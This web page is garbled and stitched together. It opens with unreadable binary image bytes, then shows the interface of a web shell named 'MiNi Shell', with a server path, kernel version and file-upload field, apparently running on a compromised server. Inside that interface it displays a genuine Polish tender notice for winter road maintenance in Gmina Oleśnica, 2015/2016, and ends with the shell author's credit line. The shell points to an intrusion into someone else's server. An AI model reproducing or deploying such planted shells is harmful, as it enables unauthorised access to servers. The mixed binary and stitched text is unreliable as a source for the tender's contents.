JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/309654-N-2015.html

<p class="kh_header"><b>Oleśnica: Zimowe utrzymanie dróg na terenie Gminy Oleśnica w sezonie 2015/2016.</b><br>
<b>Numer ogłoszenia: 309654 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oleśnica , ul. 11- go Listopada 24, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3140215, faks 071 3140204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olesnica.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg na terenie Gminy Oleśnica w sezonie 2015/2016..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zimowe utrzymanie dróg na terenie Gminy Oleśnica w sezonie 2015-
2016.
Zimowe utrzymanie dróg składa się z 12 zadań na których będą prowadzone niezależnie prace
związane z odśnieżaniem i zwalczaniem śliskości na terenie administrowanym przez Gminę Oleśnica
zgodnie z załącznikiem nr 10 (mapa poglądowa ZUD) i nr 11 (szczegółowe mapy dla danej
miejscowości)
Zadanie nr 1: Odśnieżanie: (max. ilość przejazdów do 35) Obręb 1 - Nowoszyce, Wszechświęte,
2
Zarzysko, Bogusławice, Wyszogród, Świerzna, ~ 11,74 km - 1 przejazd
Zadanie nr 2: Odśnieżanie: (max. ilość przejazdów do 35) Obręb 2 - Nowa Ligota , Smolna,
Gręboszyce, ~ 7,83 km - 1 przejazd
Zadanie nr 3: Odśnieżanie: (max. ilość przejazdów do 35) Obręb 3 - Dąbrowa, Smardzów, Jenkowice,
~ 15,94 km - 1 przejazd
Zadanie nr 4: Odśnieżanie: (max. ilość przejazdów do 35) Obręb 4 - Ligota Wielka, Zimnica, Ligota
Mała, Leśny Młyn ~ 19,49 km - 1 przejazd
Zadanie nr 5: Odśnieżanie: (max. ilość przejazdów do 35) Obręb 5 - Boguszyce (osiedle + wieś),
Spalice, Sokołowice (Gęsia Górka) ~ 19,05 km - 1 przejazd
Zadanie nr 6: Odśnieżanie: (max. ilość przejazdów do 35) Obręb 6 - Brzezinka, Sokołowice, Cieśle ~
19,87 km - 1 przejazd
Zadanie nr 7: Odśnieżanie: (max. ilość przejazdów do 35) Obręb 7 - Ligota Polska, Poniatowice
(Jonas, Kolonia), Ostrowina, Osada Leśna ~ 25,54 km - 1 przejazd
Zadanie nr 8: Odśnieżanie: (max. ilość przejazdów do 35) Obręb 8 - Nieciszów, Piszkawa, Krzeczyn,
Bystre (wieś + osada) ~ 21,67 km - 1 przejazd
Zadanie nr 9:
Odśnieżanie oraz posypywanie mieszanką 30% (mieszanka wykonawcy): (max. ilość przejazdów do
10)
Obręb 9 - droga gminna (od Spalic (Spolmot) do Cieśli S-8 - do granicy Gminy (Ligota Polska /
Gaszowice)), droga gminna (węzeł Gęsia Górka do skrzyżowania z drogą Cieśle - Oleśnica) oraz
droga gminna w m. Smardzów (od granicy miasta Oleśnica do granicy Gminy (Smardzów/Byków), i od
węzła Dąbrowa do restauracji Polanka) ~ 18,9 km - 1 przejazd
Zadanie nr 10/1:
Odśnieżanie oraz zwalczanie śliskości poprzez posypywanie mieszanką 10% (mieszanka wykonawcy)
chodników o długości ~ 4,015 km - max. ilość przejazdów do 10 w:
- obrębie 3 (odcinek w m. Smardzów o dł. 0,995km),
- obrębie 9 (odcinek od Spalic - Spolmot do Cieśli S-8 odcinek o dł. 3,02km),
Zadanie nr 10/2:
Odśnieżanie oraz zwalczanie śliskości poprzez posypywanie mieszanką 10% (mieszanka wykonawcy)
chodników o długości ~ 3,98 km - max. ilość przejazdów do 35 w:
- obrębie 3 (odcinek w m. Cieśle o dł. 0,45km)
- obrębie 7 (odcinek w m. Poniatowice o dł. 1,56km)
- obrębie 8 (odcinek w m. Krzeczyn o dł. 0,82km)
- obrębie 6 (odcinek w m. Sokołowice o dł. 0,4 km)
- obrębie 3 (odcinek w m. Dąbrowa o dł. 0,75 km)
Zadanie nr 11:
Odśnieżanie oraz zwalczanie śliskości poprzez posypywanie dróg gminnych mieszanką 30%
(mieszanka wykonawcy) na terenie Gminy Oleśnica w ilości do 450 km w okresie realizacji umowy
(realnego, rzeczywistego odśnieżania z posypywaniem), interwencyjnie, na polecenie Zamawiającego
Zadanie 12:
Usuwanie oraz ewentualny wywóz nadmiaru śniegu lub błota pośniegowego na terenie Gminy
Oleśnica na plac wykonawcy w ilości do 138 godz. w okresie realizacji umowy (rzeczywistej pracy na
drogach), interwencyjnie, na polecenie Zamawiającego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagtane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) wykażą, że dysponują sprzętem ( wg załącznika nr 4):
- zadanie od 1 do 8 - min. ciągnik rolniczy/pojazd z pługiem do odśnieżania, mechaniczny o mocy
min. 80 KM przystosowany do czołowego odśnieżania
- zadanie 9 - samochód ciężarowy z pługiem i piaskarką o ładowności powyżej 6 t - szt. 1
- zadanie 10 - min. 2 ciągniki rolnicze/ pojazdy mechaniczne o mocy od 40 KM do 55 KM
przystosowane do odśnieżania oraz zwalczania śliskości na chodnikach, posiadający ubezpieczenie
OC
zadanie 11 - samochód ciężarowy z pługiem i piaskarką o ładowności powyżej 6 t - szt. 1
zadanie 12 - ładowarka czołowa o pojemności łyżki min. 0,8 m3 oraz sam. ciężarowy
samowyładowczy o min. ładowności 5 t
- Wykonawca nie może wskazać tego samego sprzętu w przypadku składania oferty więcej niż na 1
zadanie- 1 część
2) wykażą, że dysponują osobami zdolnymi do wykonania zamówienia ( wg załącznika nr 5)
Za spełnienie warunku Zamawiający uzna dysponowanie osobami zdolnymi do wykonywania
zamówienia posiadający kwalifikacje niezbędne do obsługi n.w. pojazdów
a) zadanie od 1 do 8 - min. 1 osoba do obsługi ( dla każdej z cześć zamówienia ) ciągnika
rolniczego/pojazdu,
b) zadanie 9 - min. 1 osoba do obsługi samochodu ciężarowego z pługiem i piaskarką o ładowności
powyżej 6 t
c) zadanie 10 - min. 2 osoby do obsługi ciągnika rolniczego/pojazdu mechanicznego o mocy od 40
kM do 55 kM , przystosowanie do odśnieżania oraz zwalczania śliskości na chodnikach
d) zadanie 11 - min. 1 osoba do obsługi samochodu ciężarowego z pługiem i piaskarką o
ładowności powyżej 6 t
e) zadania 12 - min. 1 osoba do obsługi ładowarki czołowa o pojemności łyżki min. 0,8 m3 oraz sam.
ciężarowego samowyładowczego o min. ładowności 5 t
- Wykonawca nie może wskazać tych samych osób w przypadku składania oferty więcej niż na 1
zadanie- 1 część - zadania nr 1- 12</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - termin płatności - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje wprowadzenie zmian postanowień zawartej umowy w stosunku do treści
oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej
jednej z okoliczności wymienionych poniżej, z uwzględnieniem warunków ich wprowadzenia:
1) Zmiany spowodowane warunkami atmosferycznymi, geologicznymi;
2) Zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy.
3) Zmiany stawki podatku VAT wynikającej z odrębnych przepisów;
4) Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.
2. Wprowadzenie zmian może nastąpić na pisemny wniosek Zamawiającego lub Wykonawcy z
określeniem warunków dokonania zmiany z uwzględnieniem: opisu i uzasadnieniem zmiany,
kosztów zmiany i sposób jej obliczenia oraz wpływ zmiany na wysokość wynagrodzenia , a także
czas wykonywania zmiany i jej wpływ zmiany na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.olesnica.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy ul. 11 Listopada 24 56-400 Oleśnica pok. nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2015 godzina 09:00, miejsce: Urząd Gminy ul. 11 Listopada 24 56-400 Oleśnica pok. nr 1- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com